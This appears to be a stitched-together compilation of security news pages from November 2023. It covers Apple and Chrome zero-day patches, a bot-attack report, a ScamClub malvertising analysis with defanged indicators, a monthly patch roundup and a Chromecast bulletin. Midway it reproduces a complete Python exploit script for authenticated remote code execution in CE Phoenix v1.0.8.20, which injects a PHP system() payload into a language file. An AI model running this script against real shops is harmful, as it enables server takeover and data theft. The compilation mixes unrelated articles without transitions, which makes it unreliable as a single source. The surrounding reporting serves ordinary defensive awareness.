Apple has released software updates for iOS, iPadOS, macOS, and Safari web browser to address two security flaws that it said have come under active exploitation in the wild on older versions of its software.
The vulnerabilities, both of which reside in the WebKit web browser engine, are described below -

CVE-2023-42916 - An out-of-bounds read issue that could be exploited to

Spyware / Threat Analysis

Apple has released software updates for iOS, iPadOS, macOS, and Safari web browser to address two security flaws that it said have come under active exploitation in the wild on older versions of its software.

The vulnerabilities, both of which reside in the WebKit web browser engine, are described below -

*   **CVE-2023-42916** - An out-of-bounds read issue that could be exploited to leak sensitive information when processing web content.
*   **CVE-2023-42917** - A memory corruption bug that could result in arbitrary code execution when processing web content.

Apple said it's aware of reports exploiting the shortcomings "against versions of iOS before iOS 16.7.1," which was released on October 10, 2023. Clément Lecigne of Google's Threat Analysis Group (TAG) has been credited with discovering and reporting the twin flaws.

The iPhone maker did not provide additional information regarding ongoing exploitation, but previously disclosed zero-days in iOS have been used to deliver mercenary spyware targeting high-risk individuals, such as activists, dissidents, journalists, and politicians.

It's worth pointing out here that every third-party web browser that's available for iOS and iPadOS, including Google Chrome, Mozilla Firefox, and Microsoft Edge, and others, are powered by the WebKit rendering engine due to restrictions imposed by Apple, making it a lucrative and broad attack surface.

The updates are available for the following devices and operating systems -

*   **iOS 17.1.2 and iPadOS 17.1.2** - iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later
*   **macOS Sonoma 14.1.2** - Macs running macOS Sonoma
*   **Safari 17.1.2** - Macs running macOS Monterey and macOS Ventura

With the latest security fixes, Apple has remediated as many as 19 actively exploited zero-days since the start of 2023. It also comes days after Google shipped fixes for a high-severity flaw in Chrome (CVE-2023-6345) that has also come under real-world attacks, making it the seventh zero-day to be patched by the company this year.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Zero-Day Alert: Apple Rolls Out iOS, macOS, and Safari Patches for 2 Actively Exploited Flaws

By Waqas
Immediate Action Required: Update Your Apple Devices, Including iPads, MacBooks, and iPhones, NOW!
This is a post from HackRead.com Read the original post: Apple Issues Urgent Security Patches for Zero-Day Vulnerabilities

Apple has recently released security updates to tackle two zero-day vulnerabilities (CVE-2023-42916 and CVE-2023-42917) that hackers are actively exploiting.

Apple Inc. today released crucial security updates aimed at mitigating two critical zero-day vulnerabilities identified as CVE-2023-42916 and CVE-2023-42917. These vulnerabilities have been actively exploited by hackers, posing a significant risk to a wide range of Apple devices.

The vulnerabilities allow attackers to execute arbitrary code and access sensitive data on compromised devices. These security flaws are particularly concerning because they can be exploited through malicious web pages, exploiting a memory corruption bug to gain unauthorized access.

****Affected Devices****

Apple’s advisory lists a comprehensive range of devices vulnerable to these exploits:

*   iPhone XS and later models
*   iPad Pro 10.5-inch
*   iPad (6th generation and later)
*   iPad Air (3rd generation and later)
*   iPad mini (5th generation and later)
*   iPad Pro 11-inch (1st generation and later)
*   iPad Pro 12.9-inch (2nd generation and later)
*   Mac computers running macOS Monterey, Ventura, and Sonoma

****Immediate Action Recommended****

Apple urges all users of these devices to update their software immediately. The updates are designed to patch the vulnerabilities and protect devices from potential exploits. Users can update their devices by going to the ‘Settings’ menu, selecting ‘General’, and then tapping on ‘Software Update’.

The urgent release of these security patches highlights the growing challenges in cybersecurity. Security experts advise users to always keep their software updated to the latest version and to be cautious of suspicious web pages and downloads.

In a comment to Hackread.com, Michael Covington, VP of Portfolio Strategy at Apple device security and management company Jamf, urged users to immediately update their devices.

“These latest OS updates, which address bugs in Apple’s WebKit, show that attackers continue to focus on exploiting the framework that downloads and presents web-based content,” Michael said. The latest bugs could lead to both data leakage and arbitrary code execution and appear to be tied to targeted attacks that are common against high-risk users,” he wanted.

****How to Update Your Apple Devices?****

Apple provides detailed instructions to ensure that users update their devices effectively. For iPhone and iPad users, navigate to Settings > General and click on Software Update.

For macOS users, click on the Apple menu (), go to System Settings, select General, and then click on Software Update. Automatic updates should be enabled to receive the Rapid Security Response patches seamlessly. Restarting the device may be necessary to complete the update process.

****_RELATED ARTICLES_****

1.  **Apple Safari Safest, Google Chrome Riskiest Browser of 2022**
2.  **Update NOW! Pegasus Spyware Exploiting iPhones on Latest iOS**
3.  **Apple issues iPhone software update after fake police ransomware scam**

Apple Issues Urgent Security Patches for Zero-Day Vulnerabilities

By Deeba Ahmed
The conclusion was reached after researchers evaluated over 9,500 of the largest transactional websites in terms of traffic,…
This is a post from HackRead.com Read the original post: 68% of US Websites Exposed to Bot Attacks

The conclusion was reached after researchers evaluated over 9,500 of the largest transactional websites in terms of traffic, encompassing sectors such as banking, e-commerce, and ticketing businesses.

Bad bots are plaguing the internet, making up over 30% of internet traffic today. Cybercriminals can use them to target online businesses with fraud and other types of attacks, according to the latest research from online fraud and mitigation company DataDome.

According to a report from DataDome, a company specializing in bot and online fraud protection, released on November 28, 68% of US websites lack adequate protection against simple bot attacks, highlighting how vulnerable US businesses could be to automated cyberattacks.

The researchers assessed more than 9,500 of the largest transactional websites in terms of traffic, including banking, e-commerce, and ticketing businesses. They found that the US websites face significant risks ahead of the busy holiday shopping season. The findings also highlighted that traditional CAPTCHAs aren’t effective in preventing automated attacks.

As per DataDome’s report shared with Hackread.com ahead of publication on Tuesday, 72.3% of e-commerce websites and 65.2% of classified ad websites failed the bot tests, whereas 85% of DataDome’s fake Chrome bots remained undetected.

Among the 2,587 websites featuring one CAPTCHA tool, less than 5% could detect/block all bots. Interestingly, gambling sites were the most well-protected against bot attacks, with 31% blocking all the test bots. Only 10.2% successfully blocked all malicious bot requests.

DataDome’s Head of Research, Antoine Vastel, referred to bots as “silent assassins”, adding that bots are becoming sophisticated day-by-day and US businesses are unprepared for the “financial and reputational damage” bot attacks can cause.

This, as per Vastel, includes threats like ticket scalping, inventory hoarding, and account fraud. Vastel explained that bad bots can wreak havoc on businesses and consumers, exposing them to “unnecessary risk.”

These findings highlight the urgent need for US businesses to enhance their bot protection measures. Here are 5 key points on how owners and administrators can protect their wbsites against bot attacks:

1.  **Implement CAPTCHA and reCAPTCHA:** CAPTCHAs and reCAPTCHAs are effective tools for distinguishing between humans and bots. They can be used to prevent bots from submitting forms, signing up for accounts, or accessing restricted areas of your website.
2.  **Use IP blacklisting:** IP blacklisting involves identifying and blocking IP addresses that are known to be associated with malicious activity. This can help to prevent bots from accessing your website altogether.
3.  **Monitor website traffic:** By monitoring website traffic, you can identify patterns that may be indicative of bot activity. For example, if you see a sudden surge in traffic from a single IP address, this could be a sign that your website is under attack from a botnet.
4.  **Implement rate limiting:** Rate limiting is a technique that can be used to limit the number of requests that a user can make to your website in a given period of time. This can help to prevent bots from overwhelming your website with requests.
5.  **Use web application firewalls (WAFs):** WAFs are designed to protect websites from a variety of attacks, including bot attacks. They can be used to block malicious traffic and prevent bots from exploiting vulnerabilities in your website’s code.

****_RELATED ARTICLES_****

1.  IBM X-Force Discovers Gootloader Malware Variant- GootBot
2.  Qakbot Botnet Disrupted, Infected 700,000 Computers Globally
3.  Telekopye Toolkit Used as Telegram Bot to Scam Marketplace Users
4.  Proton CAPTCHA: New Privacy-First CAPTCHA Defense Against Bots
5.  Google Workspace Exposed to Takeover from Domain-Wide Delegation Flaw

68% of US Websites Exposed to Bot Attacks

A fake antivirus alert may suddenly hijack your screen while browsing. This latest malvertising campaign hit top publishers.

ScamClub is a threat actor who’s been involved in malvertising activities since 2018. Chances are you probably ran into one of their online scams on your mobile device.

Confiant, the firm that has tracked ScamClub for years, released a comprehensive report in September while also disrupting their activities. However, ScamClub has been back for several weeks, and more recently they were behind some very high profile malicious redirects.

The list of affected publishers includes the Associated Press, ESPN and CBS, where unsuspecting readers are automatically redirected to a fake security alert connected to a malicious McAfee affiliate.

ScamClub is resourceful and continues to have a deep impact on the ad ecosystem. While we could not identify precisely which entity served the ad, we have reported the website used to run the fake scanner to Cloudflare which immediately took action and flagged it as phishing.

**Forced redirects**

Mastodon user Blair Strater (@r000t@fosstodon.org) was simply browsing the Associated Press website on his phone when he was suddenly redirected to a fake security scan page:

Malicious redirect from APnews.com (credit Blair Strater)

This fake scanner is not run by McAfee, but the domain name _systemmeasures\[.\]life_ that we see in the address bar is the landing page that redirects to one of its affiliates. That affiliate was previously reported but continues unabated.

Web traffic between malicious page and McAfee site

Based on public data, several ad exchanges were abused to deliver this fake antivirus campaign via real-time bidding (RTB) in the past few weeks Most of the telemetry we saw from our Malwarebytes user base was related to smaller websites with ‘risky’ advertisers. However, a different campaign was targeting mobile users with malicious ads slipping by on top publishers (note: this data comes from VirusTotal):

**ESPN.COM (1.585B monthly visits)**

systemmeasures\[.\]life/avs/en/mob/**mcafee-2**.php?c=5uz3hbaiz7oz2&k=b47648817b492be8ba9c7dc97addefb6&country\_code=US&carrier=Verizon&country\_name=United%20States&region=New%20York&city=Bronx&isp=MCI%20Communications%20Services,%20Inc.%20d/b/a%20Verizon%20Business&lang=en&ref\_domain=**www.espn.com**&os=**iOS**&osv=17&browser=Chrome&browserv=119&brand=Apple&model=iPhone&marketing\_name=iPhone&tablet=2&rheight=0&rwidth=0&e=5

**APNEWS.COM (307.2M monthly visits)**

systemmeasures\[.\]life/avs/en/mob/**mcafee-2**.php?c=59z40b4g6z7oz2&k=506222e0611d62c3261b9ba847063faa&country\_code=US&carrier=-&country\_name=United%20States&region=Virginia&city=Alexandria&isp=Comcast%20Cable%20Communications,%20LLC&lang=en&ref\_domain=**apnews.com**&os=**Android**&osv=10.&browser=Chrome&browserv=119&brand=unknown&model=unknown&marketing\_name=K&tablet=2&rheight=0&rwidth=0&e=5

**CBSSPORTS.COM (265.1M monthly visits)**

systemmeasures\[.\]life/avs/en/mob/**mcafee-2**.php?c=5uz16jptz7oz2&k=d2761f12fed2ce8472ab704fd55d49e1&country\_code=US&carrier=-&country\_name=United%20States&region=Colorado&city=Greenwood%20Village&isp=Charter%20Communications%20Inc&lang=en&ref\_domain=**www.cbssports.com**&os=**Android**&osv=10.&browser=Chrome&browserv=119&brand=unknown&model=unknown&marketing\_name=K&tablet=2&rheight=0&rwidth=0&e=5

Most of the public reports (\[1\], \[2\], \[3\]) indicate this campaign was at its peak around **November 19**. To be clear, AP, ESPN, CBS and other sites were not hacked, but rather showed malicious ads. It appears that this high profile campaign stopped shortly after, as we haven’t seen new telemetry data coming from these publishers. However, the other campaign we are also monitoring that is affecting smaller sites is still ongoing (via _eu\[.\]vulnerabilityassessments.life_ and _us.vulnerabilityassessments\[.\]life_).

**Connection with ScamClub**

We were able to connect this campaign to the ScamClub infrastructure because of another domain (_trackmaster\[.\]cc_) that was previously mentioned as belonging to the threat actor. We can see the relationship between _systemmeasures\[.\]life_ (the landing page) and _trackmaster\[.\]cc_ (the intermediary domain) in the urlscanio submission below:

urlscanio scan showing the relationship between two domains

**Fingerprinting**

Like other malvertising threat actors, ScamClub dabbles in obfuscation and evasion techniques. However, as previously detailed by Confiant, they are using much more advanced tricks. Their JavaScript uses obfuscation with changing variable names, making identification harder.

Previously, the malicious JavaScripts were hosted on Google’s cloud but they have now moved to Azure’s CDN.

ScamClub’s malicious JavaScript

**Malvertising and mobile users**

On this blog, we have covered a number of malvertising campaigns targeting Desktop, both consumer and enterprise. This is in part because we hunt for Windows malware and the occasional Mac ones too.

ScamClub is a good example of targeting a big market segment, Mobile Web, where security software is often an afterthought, in particular on iOS, in part due to restrictions imposed by Apple. Clearly, malvertising is flourishing on Mobile and users are just as likely, if not more, to get tricked into downloading malware or get scammed.

Malwarebytes for Android protects users from this campaign:

**Indicators of Compromise**

**ScamClub URLs**

octob\[.\]azureedge\[.\]net/oc.js
lzi\[.\]azureedge\[.\]net/lz.js
tinlc\[.\]azureedge\[.\]net/pt.js
bm-rb\[.\]azureedge.net/rb.js
foluo\[.\]azureedge\[.\]net/fo.js
vpv-ger\[.\]azureedge\[.\]net/VpaidVideoAd1.js

**ScamClub JavaScript hashes**

c01716e23f633b206147efbe70fb37945e3857d6575fd088ea50106fb541cf1e  
899cbfbd676159201b2281d9e0e66f3ac200ac58b674375bde04083ff87650ad  
451b48c8f247f25cd09a1bf4a52fc195a74830d88bd2ffed7a5d4b7830e10621  
495304b489cecd33188ca2a7407d397996fd82ea99966e7c145f0dc67ab2dfb5  
a616fc2c1a075170d4decdb9d3c9ad15f2cfbcfda78dbe4c60d72132b9d006c9  
34f15ec739df72f5ac245db3fff11ea56407e95b94e24bbb820d7999032866d8  
a7a73d3bc716346808b2ee8070dfe5842bb01e10aee1fa9ba87fb975d71d0f4f  
de2f1745cdfbe58266b804961bdbd5be8f533843ed7fdf4b5fe6eb0060876b56  
1614786dd6ff4189975e8226ab7e68d258817b435c3c4e145951f5147699878e  
52cd9f2ff282354c77087b204d5cb32cee9066e8eea4e3c3b8f7cf4d3d3fa20f  
df03df284bfbbe006383f26c0c91394f4c4c8d915d04b868a00954f63e6163e0  
2f3867d33c448b941278671df9a2b8d3d6b29dec5d74b67654f5edfcc6771575  
243d9d70703644f3df148e7633f3ec461a9c43149ea58fd547e2e6fd0c47cce5

**Redirectors**

trackmaster\[.\]cc  
protectsystemtools\[.\]life  
securitypatch\[.\]life  
real-time-system-monitoring\[.\]life  
threatdetectorhub\[.\]life  
threatdetectorhub\[.\]online  
vulnerabilityassessments\[.\]life  
strike-it-lucky\[.\]space  
golden-opportunity\[.\]xyz  
stroke-of-luck\[.\]xyz  
blessed-with-luck\[.\]space  
system-scan-tool\[.\]space  
system-security-scan\[.\]buzz  
system-security-scan\[.\]net  
system-scan-tool\[.\]online  
trk6\[.\]kokamedia\[.\]com  
tracklinker\[.\]space  
trackmenow\[.\]life  
trackify\[.\]world  
trackinghub\[.\]info  
trkmyclk\[.\]xyz  
trk-server\[.\]xyz

34.74.68\[.\]195

**Scam landing pages**

systemmeasures\[.\]life
xyzcreators\[.\]xyz

 Associated Press, ESPN, CBS among top sites serving fake virus alerts 

Plus: Major security patches from Microsoft, Mozilla, Atlassian, Cisco, and more.

The holiday season is here, but software firms are still busy issuing fixes for major security flaws. Microsoft, Google, and enterprise software firm Atlassian have released patches for vulnerabilities already being used in attacks. Cisco also patched a bug deemed so serious, it was given a near-maximum CVSS score of 9.9.

Here’s everything you need to know about the patches released in November.

Google Chrome

Google ended November with a bang after issuing seven security fixes for Chrome, including an emergency patch for an issue already being used in real-life attacks. Tracked as CVE-2023-6345, the already exploited flaw is an integer overflow issue in Skia, an open source 2D graphics library. “Google is aware that an exploit for CVE-2023-6345 exists in the wild,” the browser maker said in an advisory.

Little is known about the fix at the time of writing; however, it was reported by Benoît Sevens and Clément Lecigne of Google's Threat Analysis Group, indicating the exploit could be spyware-related.

The six other flaws fixed by Google and rated as having a high impact include CVE-2023-6348, a type-confusion bug in Spellcheck, and CVE-2023-6351, a use-after-free issue in libavif.

Earlier in the month, Google released fixes for 15 security issues in its widely used browser. Among the bugs fixed by the software giant are three rated as having a high severity. Tracked as CVE-2023-5480, the first is an inappropriate implementation issue in Payments, while the second, CVE-2023-5482, is an insufficient data validation flaw in USB with a CVSS score of 8.8. The third high-severity bug, CVE-2023-5849, is an integer overflow issue in USB.

Mozilla Firefox

Chrome competitor Firefox has fixed 10 vulnerabilities in the browser, six of which are rated as having a high impact. CVE-2023-6204 is an out-of-bound memory access flaw in WebGL2 blitFramebuffer, while CVE-2023-6205 is a use-after-free issue in MessagePort.

Meanwhile, CVE-2023-6206 could allow clickjacking permission prompts using the full-screen transition. “The black fade animation when exiting full screen is roughly the length of the anti-clickjacking delay on permission prompts,” Firefox owner Mozilla said. “It was possible to use this fact to surprise users by luring them to click where the permission grant button would be about to appear.”

CVE-2023-6212 and CVE-2023-6212 are Memory safety bugs, both with a CVSS score of 8.8, in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5.

Google Android

Google's November Android Security Bulletin details fixes patched in this month, including eight in the Framework, six of which are elevation of privilege bugs. The worst flaw could lead to local escalation of privilege with no additional execution privileges needed, Google said in an advisory.

Google also fixed seven issues in the System, six of which are rated as having a high severity and one marked as critical. Tracked as CVE-2023-40113, the critical bug could lead to local information disclosure with no additional execution privileges needed.

Google's Pixel devices have already received the November update, along with some additional fixes. The November Android Security Bulletin has also started to roll out to some of Samsung’s Galaxy line.

Microsoft

Microsoft has a Patch Tuesday every month, but November's is worth notice. The update fixes 59 vulnerabilities, two of which are already being exploited in real-life attacks. Tracked as CVE-2023-36033, the first is an elevation of privilege vulnerability in Windows DWM Core Library marked as important, with a CVSS score of 7.8. “An attacker who successfully exploited this vulnerability could gain SYSTEM privileges,” Microsoft said.

Meanwhile, CVE-2023-36036 is an elevation of privilege vulnerability in Windows Cloud Files Mini Filter Driver with a CVSS score of 7.8. Also fixed in November’s update cycle is the already exploited libWep flaw previously fixed in Chrome and other browsers, which also impacts Microsoft’s Edge, tracked as CVE-2023-4863.

Another notable flaw is CVE-2023-36397, a remote code execution vulnerability in Windows Pragmatic General Multicast marked as critical with a CVSS score of 9.8. “When Windows message queuing service is running in a PGM Server environment, an attacker could send a specially crafted file over the network to achieve remote code execution and attempt to trigger malicious code,” Microsoft said.

Cisco

Enterprise software firm Cisco has issued fixes for 27 security flaws, including one rated as critical with a near maximum CVSS score of 9.9. Tracked as CVE-2023-20048, the vulnerability in the web services interface of Cisco Firepower Management Center Software could allow an authenticated, remote attacker to execute unauthorized configuration commands on a Firepower Threat Defense device managed by the FMC Software.

However, to successfully exploit the vulnerability, an attacker would need valid credentials on the FMC Software, Cisco said.

A further seven of the flaws fixed by Cisco are rated as having a high impact, including CVE-2023-20086—a denial-of-service flaw with a CVSS score of 8.6—and CVE-2023-20063, a code-injection vulnerability with a CVSS score of 8.2.

Atlassian

Atlassian has released a patch to fix a serious flaw already being used in real-life attacks. Tracked as CVE-2023-22518, the improper-authorization vulnerability issue in Confluence Data Center and Server is being used in ransomware attacks. “As part of Atlassian's ongoing monitoring and investigation of this CVE, we observed several active exploits and reports of threat actors using ransomware,” it said.

Security outfit Trend Micro reported the Cerber ransomware group is using the flaw in attacks. “This is not the first time that Cerber has targeted Atlassian—in 2021, the malware re-emerged after a period of inactivity and focused on exploiting remote code execution vulnerabilities in Atlassian's GitLab servers,” Trend Micro said.

All versions of Confluence Data Center and Server are affected by the flaw, which allows an unauthenticated attacker to reset Confluence and create an administrator account. “Using this account, an attacker can perform all administrative actions available to a Confluence instance administrator, leading to a full loss of confidentiality, integrity and availability,” Atlassian said.

SAP

Enterprise software giant SAP has released its November Security Patch Day, fixing three new flaws. Tracked as CVE-2023-31403 and with a CVSS score of 9.6, the most serious issue is an improper access control vulnerability flaw in SAP Business One. As a result of exploiting the issue, a malicious user could read and write to the SMB shared folder, the software giant said.

Google Fixes a Seventh Zero-Day Flaw in Chrome—Update Now

CE Phoenix version 1.0.8.20 remote code execution exploit written in Python.

    ## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)#### Date: 2023-11-25#### Exploit Author: tmrswrr#### Category: Webapps#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)#### Version: v1.0.8.20#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)## EXPLOIT :import requestsfrom bs4 import BeautifulSoupimport sysimport urllib.parseimport randomfrom time import sleepclass colors:    OKBLUE = '\033[94m'    WARNING = '\033[93m'    FAIL = '\033[91m'    ENDC = '\033[0m'    BOLD = '\033[1m'    UNDERLINE = '\033[4m'    CBLACK = '\33[30m'    CRED = '\33[31m'    CGREEN = '\33[32m'    CYELLOW = '\33[33m'    CBLUE = '\33[34m'    CVIOLET = '\33[35m'    CBEIGE = '\33[36m'    CWHITE = '\33[37m' def entry_banner():    color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,                    colors.CRED, colors.CBEIGE]    random.shuffle(color_random)    banner = color_random[0] + """     CE Phoenix v1.0.8.20 - Remote Code Execution \n     Author: tmrswrr    """    for char in banner:        print(char, end='')        sys.stdout.flush()        sleep(0.0045)def get_formid_and_cookies(session, url):    response = session.get(url, allow_redirects=True)    if response.ok:        soup = BeautifulSoup(response.text, 'html.parser')        formid_input = soup.find('input', {'name': 'formid'})        if formid_input:            return formid_input['value'], session.cookies    return None, Nonedef perform_exploit(session, url, username, password, command):    print("\n[+] Attempting to exploit the target...")       initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"    formid, cookies = get_formid_and_cookies(session, initial_url)    if not formid:        print("[-] Failed to retrieve initial formid.")        return    # Login    print("[+] Performing login...")    login_payload = {        'formid': formid,        'username': username,        'password': password    }    login_headers = {        'Content-Type': 'application/x-www-form-urlencoded',        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',        'Referer': initial_url    }    login_url = url + "/admin/login.php?action=process"    login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)    if not login_response.ok:        print("[-] Login failed.")        print(login_response.text)        return    print("[+] Login successful.")    new_formid, _ = get_formid_and_cookies(session, login_response.url)    if not new_formid:        print("[-] Failed to retrieve new formid after login.")        return    # Exploit    print("[+] Executing the exploit...")    encoded_command = urllib.parse.quote_plus(command)    exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"    exploit_headers = {        'Content-Type': 'application/x-www-form-urlencoded',        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',        'Referer': login_response.url    }    exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"    exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)    if exploit_response.ok:        print("[+] Exploit executed successfully.")    else:        print("[-] Exploit failed.")        print(exploit_response.text)        final_response = session.get(url)    print("\n[+] Executed Command Output:\n")    print(final_response.text)  def main(base_url, username, password, command):    print("\n[+] Starting the exploitation process...")    session = requests.Session()    perform_exploit(session, base_url, username, password, command)if __name__ == "__main__":    entry_banner()    if len(sys.argv) < 5:        print("Usage: python script.py [URL] [username] [password] [command]")        sys.exit(1)    base_url = sys.argv[1]    username = sys.argv[2]    password = sys.argv[3]    command = sys.argv[4]    main(base_url, username, password, command)

CE Phoenix 1.0.8.20 Remote Code Execution

Google's released an update to Chrome which includes seven security fixes. Make sure you're using the latest version!

Google has released an update to Chrome which includes seven security fixes including one for a vulnerability which is known to have already been exploited.

If you’re a Chrome user on Windows, Mac, or Linux, you should update as soon as possible.

The easiest way to update Chrome is to set it to update automatically, but you have to make sure to close your browser for the update to finish. You can also end up on an older, vulnerable version if something goes wrong—such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerabilities in this batch. My preferred method is to have Chrome open the page _chrome://settings/help_ which you can also find by clicking **Settings > About Chrome** (on Windows) or **Google Chrome > About Google Chrome** (on Mac).

If there is an update available, Chrome will start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

_Google Chrome is up to date_

After the update, the version should be listed as 119.0.6045.199 for Mac and Linux, and 119.0.6045.199/.200 for Windows, or later.

**The technical details**

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE assigned to the actively expoited zero-day is:

CVE-2023-6345: Integer overflow in Skia. Google notes it is aware that an exploit for CVE-2023-6345 exists in the wild. This vulnerability could lead to a range of risks, from crashes to the execution of arbitrary code.

Google never gives out a lot of information about vulnerabilities, for obvious reasons. Access to bug details and links may be kept restricted until a majority of users are updated with a fix, so that interested criminals remain none the wiser.

The fact that the vulnerability is listed with a severity rating of High, indicates that the scope of the flaw is limited to the browser, but this could mean successful exploitation could provide the attacker with information about visited websites and so on.

Skia is an open source 2D graphic library for drawing Text, Geometries, and Images. Skia works across a variety of hardware and software platforms. It serves as the graphics engine for Google Chrome and ChromeOS, Android, Flutter, and many other products.

That’s why users of other Chromium based browsers and software that uses Skia should keep their eyes open for similar updates.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Update now! Chrome fixes actively exploited zero-day vulnerability 

_Published September 25, 2023 | Updated September 29, 2023_

The Chromecast Security Bulletin contains details of security vulnerabilities affecting supported Chromecast with Google TV devices (Chromecast devices). For Chromecast devices, security patch levels of 2023-07-01 or later address all applicable issues in the July 2023 Android Security Bulletin and all issues in this bulletin. To learn how to check a device's security patch level, see Chromecast firmware versions & release notes.

All supported Chromecast devices will receive an update to the 2023-07-01 patch level. We encourage all customers to accept these updates to their devices.

**Announcements**

*   In addition to the security vulnerabilities described in the July 2023 Android Security Bulletin, Chromecast devices also contain patches for the security vulnerabilities described below.

**Security patches**

Vulnerabilities are grouped under the component that they affect. There is a description of the issue and a table with the CVE, associated references, type of vulnerability, severity, and updated Android Open Source Project (AOSP) versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**AMLogic**

   

CVE

References

Severity

Subcomponent

CVE-2022-42536

A-258698524

High

Secure Monitor

CVE-2022-42537

A-258699189

High

Secure Monitor

CVE-2022-42541

A-258698507

High

Secure Monitor

CVE-2022-42538

A-258698938

High

Secure Monitor

CVE-2022-42540

A-258699554

High

Secure Monitor

CVE-2022-42539

A-258699550

High

Secure Monitor

**Functional patches**

For details on the new bug fixes and functional patches included in this release, refer to the Chromecast firmware versions & release notes.

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

Security patch levels of 2023-07-01 or later address all issues associated with the 2023-07-01 security patch level and all previous patch levels. To learn how to check a device's security patch level, read the instructions on the Chromecast firmware versions & release notes.

**2\. Why are security vulnerabilities split between this bulletin and the Android Security Bulletins?**

Security vulnerabilities that are documented in the Android Security Bulletins are required to declare the latest security patch level on Android devices. Additional security vulnerabilities, such as those documented in this bulletin are not required for declaring a security patch level.

**3\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**4\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

**5\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the Android bug ID in the _References_ column.

**Versions**

  

Version

Date

Notes

1.0

September 25, 2023

1.1

September 29, 2023

Added AMLogic CVEs

CVE-2022-42541: Chromecast Security Bulletin—September 2023

The vulnerability is among a rapidly growing number of zero-day bugs that major browser vendors have reported recently.

Source: PREMIO STOCK via Shutterstock

For the fourth time since August, Google has disclosed a bug in its Chrome browser technology that attackers were actively exploiting in the wild before the company had a fix for it.

**Integer Overflow Bug**

The latest zero-day, which Google is tracking as CVE-2023-6345, stems from an integer overflow issue in Skia, an open source 2D graphic library in Chrome. The bug is one of seven Chrome vulnerabilities for which Google issued a security update this week.

The company's advisory contained sparse details on CVE-2023-6345 beyond mentioning the fact that an exploit for it is publicly available. A brief description on NIST's National Vulnerability Database (NVD) site described the flaw as affecting versions of Chrome prior to 119.0.6045.199 and allowing a remote attacker who has "compromised the renderer process to potentially perform a sandbox escape via a malicious file." The NVD identified the bug as a high-severity issue.

Google credited researchers at its Threat Analysis Group for finding and reporting CVE-2023-6345 on Nov. 24.

The vulnerability is the seventh zero-day that Google has rushed to patch amid active exploit activity this year and is the latest manifestation of growing attacker interest in Chrome and other browsers.

**A Flood of Browser Zero-Days**

Since the beginning of this year, Apple, Google, Microsoft, and Firefox have all disclosed multiple critical vulnerabilities in their respective browsers, including a handful of zero-days. In some instances, a bug in some widely used component affected multiple browsers at once, as was the case with CVE-2023-4863, a zero-day heap overflow in WebP, a code library common to Chrome, Apple Safari, and Mozilla Firefox. In other instances, as with CVE-2023-5217, a zero-day bug in Chrome impacted multiple browsers based on Chromium technology, such as Microsoft Edge, Opera, Brave, and Vivaldi.

There were also multiple zero-days that Apple disclosed separately this year in its WebKit browser engine for Safari, including CVE-2023-28205 and three others in May: CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373. Both Microsoft and Mozilla have also separately reported other critical bugs in their respective browsers.

It is unclear which threat actor might be currently exploiting CVE-2023-6345, the bug that Google disclosed this week, or why. But in recent months, Google and Apple have warned about vendors of commercial surveillance products exploiting zero-day bugs in their respective browser technologies to drop spyware on Android, iOS, and other mobile devices. Google discovered CVE-2023-4863 after researchers at Apple and Toronto University Citizen Lab informed the company about a commercial vendor using the flaw to drop Predator spyware on Android and iOS devices.

**Ubiquitous Use**

Much of the growing attacker interest in browsers has to do with their ubiquitous use, says Lionel Litty, chief security architect at Menlo Security. The exploding use of Web applications has resulted in users spending most of their time on browsers for everything from accessing applications and webpages to additional content such as PDFs and other documents. Adding to this is the drive by Google to integrate even more features into its browser and make it a replacement for fat client technologies, Litty says. This includes enabling access to USB devices, Bluetooth, and even the GPU through the WebGPU interface.

"Despite all the care taken by Google engineers, we continue to see a steady stream of security issues that are exploitable, including many zero-days that are actually exploited," he says.

The fact that multiple browsers are based on Chromium is another reason for attackers targeting the technology, Litty notes. "Developing an exploit against Chrome usually means that it will work against all browsers, save Safari and Firefox, allowing bad actors to target more victims without any additional work."

